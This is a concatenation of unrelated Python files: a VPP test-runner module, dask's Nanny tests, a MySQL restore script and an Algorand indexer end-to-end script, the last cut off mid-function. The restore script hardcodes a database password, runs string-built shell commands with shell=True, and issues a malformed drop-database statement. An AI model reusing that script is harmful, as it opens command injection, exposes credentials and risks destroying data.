def send_and_expect_only(self, intf, pkts, output, timeout=None,
stats_diff=None):
if stats_diff:
stats_snapshot = self.snapshot_stats(stats_diff)
self.pg_send(intf, pkts)
rx = output.get_capture(len(pkts))
outputs = [output]
if not timeout:
timeout = 1
for i in self.pg_interfaces:
if i not in outputs:
i.assert_nothing_captured(timeout=timeout)
timeout = 0.1
if stats_diff:
self.compare_stats_with_snapshot(stats_diff, stats_snapshot)
return rx
def get_testcase_doc_name(test):
return getdoc(test.__class__).splitlines()[0]
def get_test_description(descriptions, test):
short_description = test.shortDescription()
if descriptions and short_description:
return short_description
else:
return str(test)
class TestCaseInfo(object):
def __init__(self, logger, tempdir, vpp_pid, vpp_bin_path):
self.logger = logger
self.tempdir = tempdir
self.vpp_pid = vpp_pid
self.vpp_bin_path = vpp_bin_path
self.core_crash_test = None
class VppTestResult(unittest.TestResult):
"""
@property result_string
String variable to store the test case result string.
@property errors
List variable containing 2-tuples of TestCase instances and strings
holding formatted tracebacks. Each tuple represents a test which
raised an unexpected exception.
@property failures
List variable containing 2-tuples of TestCase instances and strings
holding formatted tracebacks. Each tuple represents a test where
a failure was explicitly signalled using the TestCase.assert*()
methods.
"""
failed_test_cases_info = set()
core_crash_test_cases_info = set()
current_test_case_info = None
def __init__(self, stream=None, descriptions=None, verbosity=None,
runner=None):
"""
:param stream File descriptor to store where to report test results.
Set to the standard error stream by default.
:param descriptions Boolean variable to store information if to use
test case descriptions.
:param verbosity Integer variable to store required verbosity level.
"""
super(VppTestResult, self).__init__(stream, descriptions, verbosity)
self.stream = stream
self.descriptions = descriptions
self.verbosity = verbosity
self.result_string = None
self.runner = runner
self.printed = []
def addSuccess(self, test):
"""
Record a test succeeded result
:param test:
"""
if self.current_test_case_info:
self.current_test_case_info.logger.debug(
"--- addSuccess() %s.%s(%s) called" % (test.__class__.__name__,
test._testMethodName,
test._testMethodDoc))
unittest.TestResult.addSuccess(self, test)
self.result_string = colorize("OK", GREEN)
self.send_result_through_pipe(test, PASS)
def addSkip(self, test, reason):
"""
Record a test skipped.
:param test:
:param reason:
"""
if self.current_test_case_info:
self.current_test_case_info.logger.debug(
"--- addSkip() %s.%s(%s) called, reason is %s" %
(test.__class__.__name__, test._testMethodName,
test._testMethodDoc, reason))
unittest.TestResult.addSkip(self, test, reason)
self.result_string = colorize("SKIP", YELLOW)
if reason == "not enough cpus":
self.send_result_through_pipe(test, SKIP_CPU_SHORTAGE)
else:
self.send_result_through_pipe(test, SKIP)
def symlink_failed(self):
if self.current_test_case_info:
try:
failed_dir = config.failed_dir
link_path = os.path.join(
failed_dir,
'%s-FAILED' %
os.path.basename(self.current_test_case_info.tempdir))
self.current_test_case_info.logger.debug(
"creating a link to the failed test")
self.current_test_case_info.logger.debug(
"os.symlink(%s, %s)" %
(self.current_test_case_info.tempdir, link_path))
if os.path.exists(link_path):
self.current_test_case_info.logger.debug(
'symlink already exists')
else:
os.symlink(self.current_test_case_info.tempdir, link_path)
except Exception as e:
self.current_test_case_info.logger.error(e)
def send_result_through_pipe(self, test, result):
if hasattr(self, 'test_framework_result_pipe'):
pipe = self.test_framework_result_pipe
if pipe:
pipe.send((test.id(), result))
def log_error(self, test, err, fn_name):
if self.current_test_case_info:
if isinstance(test, unittest.suite._ErrorHolder):
test_name = test.description
else:
test_name = '%s.%s(%s)' % (test.__class__.__name__,
test._testMethodName,
test._testMethodDoc)
self.current_test_case_info.logger.debug(
"--- %s() %s called, err is %s" %
(fn_name, test_name, err))
self.current_test_case_info.logger.debug(
"formatted exception is:\n%s" %
"".join(format_exception(*err)))
def add_error(self, test, err, unittest_fn, error_type):
if error_type == FAIL:
self.log_error(test, err, 'addFailure')
error_type_str = colorize("FAIL", RED)
elif error_type == ERROR:
self.log_error(test, err, 'addError')
error_type_str = colorize("ERROR", RED)
else:
raise Exception('Error type %s cannot be used to record an '
'error or a failure' % error_type)
unittest_fn(self, test, err)
if self.current_test_case_info:
self.result_string = "%s [ temp dir used by test case: %s ]" % \
(error_type_str,
self.current_test_case_info.tempdir)
self.symlink_failed()
self.failed_test_cases_info.add(self.current_test_case_info)
if is_core_present(self.current_test_case_info.tempdir):
if not self.current_test_case_info.core_crash_test:
if isinstance(test, unittest.suite._ErrorHolder):
test_name = str(test)
else:
test_name = "'{!s}' ({!s})".format(
get_testcase_doc_name(test), test.id())
self.current_test_case_info.core_crash_test = test_name
self.core_crash_test_cases_info.add(
self.current_test_case_info)
else:
self.result_string = '%s [no temp dir]' % error_type_str
self.send_result_through_pipe(test, error_type)
def addFailure(self, test, err):
"""
Record a test failed result
:param test:
:param err: error message
"""
self.add_error(test, err, unittest.TestResult.addFailure, FAIL)
def addError(self, test, err):
"""
Record a test error result
:param test:
:param err: error message
"""
self.add_error(test, err, unittest.TestResult.addError, ERROR)
def getDescription(self, test):
"""
Get test description
:param test:
:returns: test description
"""
return get_test_description(self.descriptions, test)
def startTest(self, test):
"""
Start a test
:param test:
"""
def print_header(test):
if test.__class__ in self.printed:
return
test_doc = getdoc(test)
if not test_doc:
raise Exception("No doc string for test '%s'" % test.id())
test_title = test_doc.splitlines()[0].rstrip()
test_title = colorize(test_title, GREEN)
if test.is_tagged_run_solo():
test_title = colorize(f"SOLO RUN: {test_title}", YELLOW)
# This block may overwrite the colorized title above,
# but we want this to stand out and be fixed
if test.has_tag(TestCaseTag.FIXME_VPP_WORKERS):
test_title = colorize(
f"FIXME with VPP workers: {test_title}", RED)
if test.has_tag(TestCaseTag.FIXME_ASAN):
test_title = colorize(
f"FIXME with ASAN: {test_title}", RED)
test.skip_fixme_asan()
if hasattr(test, 'vpp_worker_count'):
if test.vpp_worker_count == 0:
test_title += " [main thread only]"
elif test.vpp_worker_count == 1:
test_title += " [1 worker thread]"
else:
test_title += f" [{test.vpp_worker_count} worker threads]"
if test.__class__.skipped_due_to_cpu_lack:
test_title = colorize(
f"{test_title} [skipped - not enough cpus, "
f"required={test.__class__.get_cpus_required()}, "
f"available={max_vpp_cpus}]", YELLOW)
print(double_line_delim)
print(test_title)
print(double_line_delim)
self.printed.append(test.__class__)
print_header(test)
self.start_test = time.time()
unittest.TestResult.startTest(self, test)
if self.verbosity > 0:
self.stream.writeln(
"Starting " + self.getDescription(test) + " ...")
self.stream.writeln(single_line_delim)
def stopTest(self, test):
"""
Called when the given test has been run
:param test:
"""
unittest.TestResult.stopTest(self, test)
if self.verbosity > 0:
self.stream.writeln(single_line_delim)
self.stream.writeln("%-73s%s" % (self.getDescription(test),
self.result_string))
self.stream.writeln(single_line_delim)
else:
self.stream.writeln("%-68s %4.2f %s" %
(self.getDescription(test),
time.time() - self.start_test,
self.result_string))
self.send_result_through_pipe(test, TEST_RUN)
def printErrors(self):
"""
Print errors from running the test case
"""
if len(self.errors) > 0 or len(self.failures) > 0:
self.stream.writeln()
self.printErrorList('ERROR', self.errors)
self.printErrorList('FAIL', self.failures)
# ^^ that is the last output from unittest before summary
if not self.runner.print_summary:
devnull = unittest.runner._WritelnDecorator(open(os.devnull, 'w'))
self.stream = devnull
self.runner.stream = devnull
def printErrorList(self, flavour, errors):
"""
Print error list to the output stream together with error type
and test case description.
:param flavour: error type
:param errors: iterable errors
"""
for test, err in errors:
self.stream.writeln(double_line_delim)
self.stream.writeln("%s: %s" %
(flavour, self.getDescription(test)))
self.stream.writeln(single_line_delim)
self.stream.writeln("%s" % err)
class VppTestRunner(unittest.TextTestRunner):
"""
A basic test runner implementation which prints results to standard error.
"""
@property
def resultclass(self):
"""Class maintaining the results of the tests"""
return VppTestResult
def __init__(self, keep_alive_pipe=None, descriptions=True, verbosity=1,
result_pipe=None, failfast=False, buffer=False,
resultclass=None, print_summary=True, **kwargs):
# ignore stream setting here, use hard-coded stdout to be in sync
# with prints from VppTestCase methods ...
super(VppTestRunner, self).__init__(sys.stdout, descriptions,
verbosity, failfast, buffer,
resultclass, **kwargs)
KeepAliveReporter.pipe = keep_alive_pipe
self.orig_stream = self.stream
self.resultclass.test_framework_result_pipe = result_pipe
self.print_summary = print_summary
def _makeResult(self):
return self.resultclass(self.stream,
self.descriptions,
self.verbosity,
self)
def run(self, test):
"""
Run the tests
:param test:
"""
faulthandler.enable() # emit stack trace to stderr if killed by signal
result = super(VppTestRunner, self).run(test)
if not self.print_summary:
self.stream = self.orig_stream
result.stream = self.orig_stream
return result
class Worker(Thread):
def __init__(self, executable_args, logger, env=None, *args, **kwargs):
super(Worker, self).__init__(*args, **kwargs)
self.logger = logger
self.args = executable_args
if hasattr(self, 'testcase') and self.testcase.debug_all:
if self.testcase.debug_gdbserver:
self.args = ['/usr/bin/gdbserver', 'localhost:{port}'
.format(port=self.testcase.gdbserver_port)] + args
elif self.testcase.debug_gdb and hasattr(self, 'wait_for_gdb'):
self.args.append(self.wait_for_gdb)
self.app_bin = executable_args[0]
self.app_name = os.path.basename(self.app_bin)
if hasattr(self, 'role'):
self.app_name += ' {role}'.format(role=self.role)
self.process = None
self.result = None
env = {} if env is None else env
self.env = copy.deepcopy(env)
def wait_for_enter(self):
if not hasattr(self, 'testcase'):
return
if self.testcase.debug_all and self.testcase.debug_gdbserver:
print()
print(double_line_delim)
print("Spawned GDB Server for '{app}' with PID: {pid}"
.format(app=self.app_name, pid=self.process.pid))
elif self.testcase.debug_all and self.testcase.debug_gdb:
print()
print(double_line_delim)
print("Spawned '{app}' with PID: {pid}"
.format(app=self.app_name, pid=self.process.pid))
else:
return
print(single_line_delim)
print("You can debug '{app}' using:".format(app=self.app_name))
if self.testcase.debug_gdbserver:
print("sudo gdb " + self.app_bin +
" -ex 'target remote localhost:{port}'"
.format(port=self.testcase.gdbserver_port))
print("Now is the time to attach gdb by running the above "
"command, set up breakpoints etc., then resume from "
"within gdb by issuing the 'continue' command")
self.testcase.gdbserver_port += 1
elif self.testcase.debug_gdb:
print("sudo gdb " + self.app_bin +
" -ex 'attach {pid}'".format(pid=self.process.pid))
print("Now is the time to attach gdb by running the above "
"command and set up breakpoints etc., then resume from"
" within gdb by issuing the 'continue' command")
print(single_line_delim)
input("Press ENTER to continue running the testcase...")
def run(self):
executable = self.args[0]
if not os.path.exists(executable) or not os.access(
executable, os.F_OK | os.X_OK):
# Exit code that means some system file did not exist,
# could not be opened, or had some other kind of error.
self.result = os.EX_OSFILE
raise EnvironmentError(
"executable '%s' is not found or executable." % executable)
self.logger.debug("Running executable '{app}': '{cmd}'"
.format(app=self.app_name,
cmd=' '.join(self.args)))
env = os.environ.copy()
env.update(self.env)
env["CK_LOG_FILE_NAME"] = "-"
self.process = subprocess.Popen(
['stdbuf', '-o0', '-e0'] + self.args, shell=False, env=env,
preexec_fn=os.setpgrp, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.wait_for_enter()
out, err = self.process.communicate()
self.logger.debug("Finished running `{app}'".format(app=self.app_name))
self.logger.info("Return code is `%s'" % self.process.returncode)
self.logger.info(single_line_delim)
self.logger.info("Executable `{app}' wrote to stdout:"
.format(app=self.app_name))
self.logger.info(single_line_delim)
self.logger.info(out.decode('utf-8'))
self.logger.info(single_line_delim)
self.logger.info("Executable `{app}' wrote to stderr:"
.format(app=self.app_name))
self.logger.info(single_line_delim)
self.logger.info(err.decode('utf-8'))
self.logger.info(single_line_delim)
self.result = self.process.returncode
if __name__ == '__main__':
pass
|
test_nanny.py
|
import asyncio
import gc
import logging
import multiprocessing as mp
import os
import random
from contextlib import suppress
from time import sleep
import psutil
import pytest
from tlz import first, valmap
from tornado.ioloop import IOLoop
import dask
from distributed import Client, Nanny, Scheduler, Worker, rpc, wait, worker
from distributed.compatibility import LINUX, WINDOWS
from distributed.core import CommClosedError, Status
from distributed.diagnostics import SchedulerPlugin
from distributed.metrics import time
from distributed.protocol.pickle import dumps
from distributed.utils import TimeoutError, parse_ports, tmpfile
from distributed.utils_test import captured_logger, gen_cluster, gen_test, inc
# FIXME why does this leave behind unclosed Comm objects?
@gen_cluster(nthreads=[], allow_unclosed=True)
async def test_nanny(s):
async with Nanny(s.address, nthreads=2, loop=s.loop) as n:
async with rpc(n.address) as nn:
assert n.is_alive()
[ws] = s.workers.values()
assert ws.nthreads == 2
assert ws.nanny == n.address
await nn.kill()
assert not n.is_alive()
start = time()
while n.worker_address in s.workers:
assert time() < start + 1
await asyncio.sleep(0.01)
await nn.kill()
assert not n.is_alive()
assert n.worker_address not in s.workers
await nn.instantiate()
assert n.is_alive()
[ws] = s.workers.values()
assert ws.nthreads == 2
assert ws.nanny == n.address
await nn.terminate()
assert not n.is_alive()
@gen_cluster(nthreads=[])
async def test_many_kills(s):
n = await Nanny(s.address, nthreads=2, loop=s.loop)
assert n.is_alive()
await asyncio.gather(*(n.kill() for _ in range(5)))
await asyncio.gather(*(n.kill() for _ in range(5)))
await n.close()
@gen_cluster(Worker=Nanny)
async def test_str(s, a, b):
assert a.worker_address in str(a)
assert a.worker_address in repr(a)
assert str(a.nthreads) in str(a)
assert str(a.nthreads) in repr(a)
@gen_cluster(nthreads=[], client=True)
async def test_nanny_process_failure(c, s):
n = await Nanny(s.address, nthreads=2)
first_dir = n.worker_dir
assert os.path.exists(first_dir)
ww = rpc(n.worker_address)
await ww.update_data(data=valmap(dumps, {"x": 1, "y": 2}))
pid = n.pid
assert pid is not None
with suppress(CommClosedError):
await c.run(os._exit, 0, workers=[n.worker_address])
while n.pid == pid: # wait while process dies and comes back
await asyncio.sleep(0.01)
await asyncio.sleep(1)
while not n.is_alive(): # wait while process comes back
await asyncio.sleep(0.01)
# assert n.worker_address != original_address # most likely
while n.worker_address not in s.nthreads or n.worker_dir is None:
await asyncio.sleep(0.01)
second_dir = n.worker_dir
await n.close()
assert not os.path.exists(second_dir)
assert not os.path.exists(first_dir)
assert first_dir != n.worker_dir
await ww.close_rpc()
s.stop()
@gen_cluster(nthreads=[])
async def test_run(s):
n = await Nanny(s.address, nthreads=2, loop=s.loop)
with rpc(n.address) as nn:
response = await nn.run(function=dumps(lambda: 1))
assert response["status"] == "OK"
assert response["result"] == 1
await n.close()
@pytest.mark.slow
@gen_cluster(config={"distributed.comm.timeouts.connect": "1s"})
async def test_no_hang_when_scheduler_closes(s, a, b):
# https://github.com/dask/distributed/issues/2880
with captured_logger("tornado.application", logging.ERROR) as logger:
await s.close()
await asyncio.sleep(1.2)
assert a.status == Status.closed
assert b.status == Status.closed
out = logger.getvalue()
assert "Timed out trying to connect" not in out
@pytest.mark.slow
@gen_cluster(
Worker=Nanny, nthreads=[("127.0.0.1", 1)], worker_kwargs={"reconnect": False}
)
async def test_close_on_disconnect(s, w):
await s.close()
start = time()
while w.status != Status.closed:
await asyncio.sleep(0.05)
assert time() < start + 9
class Something(Worker):
# a subclass of Worker which is not Worker
pass
@gen_cluster(client=True, Worker=Nanny)
async def test_nanny_worker_class(c, s, w1, w2):
out = await c._run(lambda dask_worker=None: str(dask_worker.__class__))
assert "Worker" in list(out.values())[0]
assert w1.Worker is Worker
@gen_cluster(client=True, Worker=Nanny, worker_kwargs={"worker_class": Something})
async def test_nanny_alt_worker_class(c, s, w1, w2):
out = await c._run(lambda dask_worker=None: str(dask_worker.__class__))
assert "Something" in list(out.values())[0]
assert w1.Worker is Something
@pytest.mark.slow
@gen_cluster(nthreads=[])
async def test_nanny_death_timeout(s):
await s.close()
w = Nanny(s.address, death_timeout=1)
with pytest.raises(TimeoutError):
await w
assert w.status == Status.closed
@gen_cluster(client=True, Worker=Nanny)
async def test_random_seed(c, s, a, b):
async def check_func(func):
x = c.submit(func, 0, 2 ** 31, pure=False, workers=a.worker_address)
y = c.submit(func, 0, 2 ** 31, pure=False, workers=b.worker_address)
assert x.key != y.key
x = await x
y = await y
assert x != y
await check_func(lambda a, b: random.randint(a, b))
np = pytest.importorskip("numpy")
await check_func(lambda a, b: np.random.randint(a, b))
@pytest.mark.skipif(WINDOWS, reason="num_fds not supported on windows")
@gen_cluster(nthreads=[])
async def test_num_fds(s):
proc = psutil.Process()
# Warm up
w = await Nanny(s.address)
await w.close()
del w
gc.collect()
before = proc.num_fds()
for i in range(3):
w = await Nanny(s.address)
await asyncio.sleep(0.1)
await w.close()
while proc.num_fds() > before:
print("fds:", before, proc.num_fds())
await asyncio.sleep(0.1)
@pytest.mark.skipif(not LINUX, reason="Need 127.0.0.2 to mean localhost")
@gen_cluster(client=True, nthreads=[])
async def test_worker_uses_same_host_as_nanny(c, s):
for host in ["tcp://0.0.0.0", "tcp://127.0.0.2"]:
n = await Nanny(s.address, host=host)
def func(dask_worker):
return dask_worker.listener.listen_address
result = await c.run(func)
assert host in first(result.values())
await n.close()
@gen_test()
async def test_scheduler_file():
with tmpfile() as fn:
s = await Scheduler(scheduler_file=fn, port=8008)
w = await Nanny(scheduler_file=fn)
assert set(s.workers) == {w.worker_address}
await w.close()
s.stop()
@gen_cluster(client=True, Worker=Nanny, nthreads=[("127.0.0.1", 2)])
async def test_nanny_timeout(c, s, a):
x = await c.scatter(123)
with captured_logger(
logging.getLogger("distributed.nanny"), level=logging.ERROR
) as logger:
response = await a.restart(timeout=0.1)
out = logger.getvalue()
assert "timed out" in out.lower()
start = time()
while x.status != "cancelled":
await asyncio.sleep(0.1)
assert time() < start + 7
@gen_cluster(
nthreads=[("127.0.0.1", 1)],
client=True,
Worker=Nanny,
worker_kwargs={"memory_limit": "400 MiB"},
)
async def test_nanny_terminate(c, s, a):
def leak():
L = []
while True:
L.append(b"0" * 5_000_000)
sleep(0.01)
before = a.process.pid
with captured_logger(logging.getLogger("distributed.nanny")) as logger:
future = c.submit(leak)
while a.process.pid == before:
await asyncio.sleep(0.01)
out = logger.getvalue()
assert "restart" in out.lower()
assert "memory" in out.lower()
@gen_cluster(
nthreads=[("127.0.0.1", 1)] * 8,
client=True,
Worker=Worker,
clean_kwargs={"threads": False},
)
async def test_throttle_outgoing_connections(c, s, a, *workers):
# But a bunch of small data on worker a
await c.run(lambda: logging.getLogger("distributed.worker").setLevel(logging.DEBUG))
remote_data = c.map(
lambda x: b"0" * 10000, range(10), pure=False, workers=[a.address]
)
await wait(remote_data)
def pause(dask_worker):
# Patch paused and memory_monitor on the one worker
# This is is very fragile, since a refactor of memory_monitor to
# remove _memory_monitoring will break this test.
dask_worker._memory_monitoring = True
dask_worker.paused = True
dask_worker.outgoing_current_count = 2
await c.run(pause, workers=[a.address])
requests = [
await a.get_data(await w.rpc.connect(w.address), keys=[f.key], who=w.address)
for w in workers
for f in remote_data
]
await wait(requests)
wlogs = await c.get_worker_logs(workers=[a.address])
wlogs = "\n".join(x[1] for x in wlogs[a.address])
assert "throttling" in wlogs.lower()
@gen_cluster(nthreads=[], client=True)
async def test_avoid_memory_monitor_if_zero_limit(c, s):
nanny = await Nanny(s.address, loop=s.loop, memory_limit=0)
typ = await c.run(lambda dask_worker: type(dask_worker.data))
assert typ == {nanny.worker_address: dict}
pcs = await c.run(lambda dask_worker: list(dask_worker.periodic_callbacks))
assert "memory" not in pcs
assert "memory" not in nanny.periodic_callbacks
future = c.submit(inc, 1)
assert await future == 2
await asyncio.sleep(0.02)
await c.submit(inc, 2) # worker doesn't pause
await nanny.close()
@gen_cluster(nthreads=[], client=True)
async def test_scheduler_address_config(c, s):
with dask.config.set({"scheduler-address": s.address}):
nanny = await Nanny(loop=s.loop)
assert nanny.scheduler.address == s.address
start = time()
while not s.workers:
await asyncio.sleep(0.1)
assert time() < start + 10
await nanny.close()
@pytest.mark.slow
@gen_test()
async def test_wait_for_scheduler():
with captured_logger("distributed") as log:
w = Nanny("127.0.0.1:44737")
IOLoop.current().add_callback(w.start)
await asyncio.sleep(6)
await w.close()
log = log.getvalue()
assert "error" not in log.lower(), log
assert "restart" not in log.lower(), log
@gen_cluster(nthreads=[], client=True)
async def test_environment_variable(c, s):
a = Nanny(s.address, loop=s.loop, memory_limit=0, env={"FOO": "123"})
b = Nanny(s.address, loop=s.loop, memory_limit=0, env={"FOO": "456"})
await asyncio.gather(a, b)
results = await c.run(lambda: os.environ["FOO"])
assert results == {a.worker_address: "123", b.worker_address: "456"}
await asyncio.gather(a.close(), b.close())
@gen_cluster(nthreads=[], client=True)
async def test_data_types(c, s):
w = await Nanny(s.address, data=dict)
r = await c.run(lambda dask_worker: type(dask_worker.data))
assert r[w.worker_address] == dict
await w.close()
@gen_cluster(nthreads=[])
async def test_local_directory(s):
with tmpfile() as fn:
with dask.config.set(temporary_directory=fn):
w = await Nanny(s.address)
assert w.local_directory.startswith(fn)
assert "dask-worker-space" in w.local_directory
assert w.process.worker_dir.count("dask-worker-space") == 1
await w.close()
def _noop(x):
"""Define here because closures aren't pickleable."""
pass
@gen_cluster(
nthreads=[("127.0.0.1", 1)],
client=True,
Worker=Nanny,
config={"distributed.worker.daemon": False},
)
async def test_mp_process_worker_no_daemon(c, s, a):
def multiprocessing_worker():
p = mp.Process(target=_noop, args=(None,))
p.start()
p.join()
await c.submit(multiprocessing_worker)
@gen_cluster(
nthreads=[("127.0.0.1", 1)],
client=True,
Worker=Nanny,
config={"distributed.worker.daemon": False},
)
async def test_mp_pool_worker_no_daemon(c, s, a):
def pool_worker(world_size):
with mp.Pool(processes=world_size) as p:
p.map(_noop, range(world_size))
await c.submit(pool_worker, 4)
@pytest.mark.asyncio
async def test_nanny_closes_cleanly(cleanup):
async with Scheduler() as s:
n = await Nanny(s.address)
assert n.process.pid
proc = n.process.process
await n.close()
assert not n.process
assert not proc.is_alive()
assert proc.exitcode == 0
@pytest.mark.slow
@pytest.mark.asyncio
async def test_lifetime(cleanup):
counter = 0
event = asyncio.Event()
class Plugin(SchedulerPlugin):
def add_worker(self, **kwargs):
pass
def remove_worker(self, **kwargs):
nonlocal counter
counter += 1
if counter == 2: # wait twice, then trigger closing event
event.set()
async with Scheduler() as s:
s.add_plugin(Plugin())
async with Nanny(s.address) as a:
async with Nanny(s.address, lifetime="500 ms", lifetime_restart=True) as b:
await event.wait()
@pytest.mark.asyncio
async def test_nanny_closes_cleanly_2(cleanup):
async with Scheduler() as s:
async with Nanny(s.address) as n:
async with Client(s.address, asynchronous=True) as client:
with client.rpc(n.worker_address) as w:
IOLoop.current().add_callback(w.terminate)
start = time()
while n.status != Status.closed:
await asyncio.sleep(0.01)
assert time() < start + 5
assert n.status == Status.closed
@pytest.mark.asyncio
async def test_config(cleanup):
async with Scheduler() as s:
async with Nanny(s.address, config={"foo": "bar"}) as n:
async with Client(s.address, asynchronous=True) as client:
config = await client.run(dask.config.get, "foo")
assert config[n.worker_address] == "bar"
@pytest.mark.asyncio
async def test_nanny_port_range(cleanup):
async with Scheduler() as s:
async with Client(s.address, asynchronous=True) as client:
nanny_port = "9867:9868"
worker_port = "9869:9870"
async with Nanny(s.address, port=nanny_port, worker_port=worker_port) as n1:
assert n1.port == 9867 # Selects first port in range
async with Nanny(
s.address, port=nanny_port, worker_port=worker_port
) as n2:
assert n2.port == 9868 # Selects next port in range
with pytest.raises(
ValueError, match="Could not start Nanny"
): # No more ports left
async with Nanny(
s.address, port=nanny_port, worker_port=worker_port
):
pass
# Ensure Worker ports are in worker_port range
def get_worker_port(dask_worker):
return dask_worker.port
worker_ports = await client.run(get_worker_port)
assert list(worker_ports.values()) == parse_ports(worker_port)
class KeyboardInterruptWorker(worker.Worker):
"""A Worker that raises KeyboardInterrupt almost immediately"""
async def heartbeat(self):
def raise_err():
raise KeyboardInterrupt()
self.loop.add_callback(raise_err)
@pytest.mark.parametrize("protocol", ["tcp", "ucx"])
@pytest.mark.asyncio
async def test_nanny_closed_by_keyboard_interrupt(cleanup, protocol):
if protocol == "ucx": # Skip if UCX isn't available
pytest.importorskip("ucp")
async with Scheduler(protocol=protocol) as s:
async with Nanny(
s.address, nthreads=1, worker_class=KeyboardInterruptWorker
) as n:
n.auto_restart = False
await n.process.stopped.wait()
# Check that the scheduler has been notified about the closed worker
assert len(s.workers) == 0
class StartException(Exception):
pass
class BrokenWorker(worker.Worker):
async def start(self):
raise StartException("broken")
@pytest.mark.asyncio
async def test_worker_start_exception(cleanup):
# make sure this raises the right Exception:
with pytest.raises(StartException):
async with Nanny("tcp://localhost:1", worker_class=BrokenWorker) as n:
await n.start()
@pytest.mark.asyncio
async def test_failure_during_worker_initialization(cleanup):
with captured_logger(logger="distributed.nanny", level=logging.WARNING) as logs:
async with Scheduler() as s:
with pytest.raises(Exception):
async with Nanny(s.address, foo="bar") as n:
await n
assert "Restarting worker" not in logs.getvalue()
|
recover.py
|
#!/usr/bin/python
import time,sys,threading,os
import subprocess as sub
user='dbuser'
pwd='123456'
path="/root/python/test/bak"
t=1
dbnamelist=[]
dblist=[]
class Mainfunc():
def __init__(self,cmd):
self.cmd=cmd
def subcommand(self):
try:
ret = sub.Popen(self.cmd,shell=True,stdout=sub.PIPE,stderr=sub.PIPE)
out,err = ret.stdout.read(),ret.stderr.read()
if err:
print("Something wrong...,the reason is %s" % err.decode('gb2312'))
except Exception as f:
print(f)
cmd = "gunzip %s/*.sql.gz " % path
un = Mainfunc(cmd)
#print("All of things will be unziped...")
un.subcommand()
#print("Fininshed!!!")
sourcelist=os.listdir(path)
def get_dbname():
for i in sourcelist:
dbname,*m = i.split('.')
dbnamelist.append(dbname)
print(dbnamelist)
for db in dbnamelist:
cmd = "cat list.txt| grep %s | awk '{print $8 }'" % db
child = sub.Popen(cmd,shell=True,stdout=sub.PIPE)
res = child.stdout.read().decode('gb2312')
if res == '':
print("Cannot find %s in list.txt..."% db)
else:
dblist.append(res.replace('\n',''))
def sqlcommand():
try:
for dbname,db,source in zip(dbnamelist,dblist,sourcelist):
sqlconnect = "mysql -u%s -h%s -p%s" % (user,db,pwd)
sqlcmd = [ sqlconnect + " -e 'drop databases %s if exists;'" % dbname,
sqlconnect + " < %s/%s " % (path,source)]
for s in sqlcmd:
recov = Mainfunc(s)
recov.subcommand()
global t
t = 0.01
except Exception as f:
print(f)
def view_bar():
try:
for i in range(0,101):
time.sleep(t)
rate = i /100
rate_num= int(rate*100)
r = '\r[%s%s]%d%%' %("="*i," "*(100-i),rate_num)
sys.stdout.write(r)
sys.stdout.flush()
print()
except Exception as f :
print(f)
def mupt():
thlist=[]
s = threading.Thread(target=sqlcommand)
v = threading.Thread(target=view_bar)
s.start()
v.setDaemon(True)
v.start()
s.join()
if __name__=="__main__":
get_dbname()
mupt()
|
e2elive.py
|
#!/usr/bin/env python3
#
import atexit
import glob
import gzip
import io
import json
import logging
import os
import random
import sqlite3
import subprocess
import sys
import tempfile
import threading
import time
import urllib.request
from util import xrun, atexitrun, find_indexer, ensure_test_db, firstFromS3Prefix
logger = logging.getLogger(__name__)
def main():
start = time.time()
import argparse
ap = argparse.ArgumentParser()
ap.add_argument('--keep-temps', default=False, action='store_true')
ap.add_argument('--indexer-bin', default=None, help='path to algorand-indexer binary, otherwise search PATH')
ap.add_argument('--indexer-port', default=None, type=int, help='port to run indexer on. defaults to random in [4000,30000]')
ap.add_argument('--connection-string', help='Use this connection string instead of attempting to manage a local database.')
ap.add_argument('--source-net', help='Path to test network directory containing Primary and other nodes. May be a tar file.')
ap.add_argument('--verbose', default=False, action='store_true')
args = ap.parse_args()
if args.verbose:
logging.basicConfig(level=logging.DEBUG)
else:
logging.basicConfig(level=logging.INFO)
indexer_bin = find_indexer(args.indexer_bin)
sourcenet = args.source_net
source_is_tar = False
if not sourcenet:
e2edata = os.getenv('E2EDATA')
sourcenet = e2edata and os.path.join(e2edata, 'net')
if sourcenet and hassuffix(sourcenet, '.tar', '.tar.gz', '.tar.bz2', '.tar.xz'):
source_is_tar = True
tdir = tempfile.TemporaryDirectory()
if not args.keep_temps:
atexit.register(tdir.cleanup)
else:
logger.info("leaving temp dir %r", tdir.name)
if not (source_is_tar or (sourcenet and os.path.isdir(sourcenet))):
# fetch test data from S3
bucket = 'algorand-testdata'
import boto3
from botocore.config import Config
from botocore import UNSIGNED
s3 = boto3.client('s3', config=Config(signature_version=UNSIGNED))
tarname = 'net_done.tar.bz2'
tarpath = os.path.join(tdir.name, tarname)
firstFromS3Prefix(s3, bucket, 'indexer/e2e2', tarname, outpath=tarpath)
source_is_tar = True
sourcenet = tarpath
tempnet = os.path.join(tdir.name, 'net')
if source_is_tar:
xrun(['tar', '-C', tdir.name, '-x', '-f', sourcenet])
else:
xrun(['rsync', '-a', sourcenet + '/', tempnet + '/'])
blockfiles = glob.glob(os.path.join(tdir.name, 'net', 'Primary', '*', '*.block.sqlite'))
lastblock = countblocks(blockfiles[0])
#subprocess.run(['find', tempnet, '-type', 'f'])
xrun(['goal', 'network', 'start', '-r', tempnet])
atexitrun(['goal', 'network', 'stop', '-r', tempnet])
psqlstring = ensure_test_db(args.connection_string, args.keep_temps)
algoddir = os.path.join(tempnet, 'Primary')
aiport = args.indexer_port or random.randint(4000,30000)
cmd = [indexer_bin, 'daemon', '-P', psqlstring, '--dev-mode', '--algod', algoddir, '--server', ':{}'.format(aiport)]
logger.debug("%s", ' '.join(map(repr,cmd)))
indexerdp = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
indexerout = subslurp(indexerdp.stdout)
indexerout.start()
atexit.register(indexerdp.kill)
time.sleep(0.2)
indexerurl = 'http://localhost:{}/'.format(aiport)
healthurl = indexerurl + 'health'
for attempt in range(20):
ok = tryhealthurl(healthurl, args.verbose, waitforround=lastblock)
if ok:
break
time.sleep(0.5)
if not ok:
logger.error('could not get indexer health')
sys.stderr.write(indexerout.dump())
return 1
try:
xrun(['python3', 'misc/validate_accounting.py', '--verbose', '--algod', algoddir, '--indexer', indexerurl], timeout=20)
xrun(['go', 'run', 'cmd/e2equeries/main.go', '-pg', psqlstring, '-q'], timeout=15)
except Exception:
sys.stderr.write(indexerout.dump())
raise
dt = time.time() - start
sys.stdout.write("indexer e2etest OK ({:.1f}s)\n".format(dt))
return 0
def hassuffix(x, *suffixes):
for s in suffixes:
